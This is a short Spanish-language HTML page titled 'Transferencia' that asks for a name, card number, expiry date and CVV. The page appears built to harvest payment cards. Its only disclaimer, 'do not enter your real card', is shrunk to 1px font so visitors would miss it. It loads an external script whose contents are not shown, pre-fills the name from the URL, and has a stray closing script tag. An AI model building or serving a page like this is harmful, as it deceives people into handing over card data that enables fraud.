
<!DOCTYPE html>
<html>
<head>
  <title>Transferencia</title>
  <style>
    form {
      width: 400px;
      margin: 0 auto;
      padding: 20px;
      border: 1px solid #ccc;
      border-radius: 4px;
    }
    form input[type="text"] {
      width: 100%;
      height: 32px;
      margin-bottom: 20px;
      padding: 0 10px;
      border: 1px solid #ccc;
      border-radius: 4px;
      font-size: 14px;
    }
    form input[type="submit"] {
      width: 100%;
      height: 32px;
      border: none;
      border-radius: 4px;
      background-color: #4caf50;
      color: white;
      font-size: 14px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <form>
    Nombre: <input type="text" name="nombre"><br>
    Número de tarjeta: <input type="text" name="tarjeta" pattern="\d{16}"><br>
    Fecha de vencimiento: <input type="text" name="vencimiento" pattern="\d{2}/\d{2}"><br>
    CVV: <input type="text" name="cvv"><br>
    <input type="submit" value="Enviar">
  </form>
  <p style="font-size:1px;">No introduzcas tu tarjeta real</script>
  <script src="transfee.js">

</script>
  <script>
    // Obtener el valor del parámetro "nombre" de la URL
    const urlParams = new URLSearchParams(window.location.search);
    const nombre = urlParams.get('nombre');
    if(nombre){
    // Establecer el valor del campo de nombre del formulario
    document.querySelector('form [name="nombre"]').value = nombre;}
  </script>
</body>
</html>


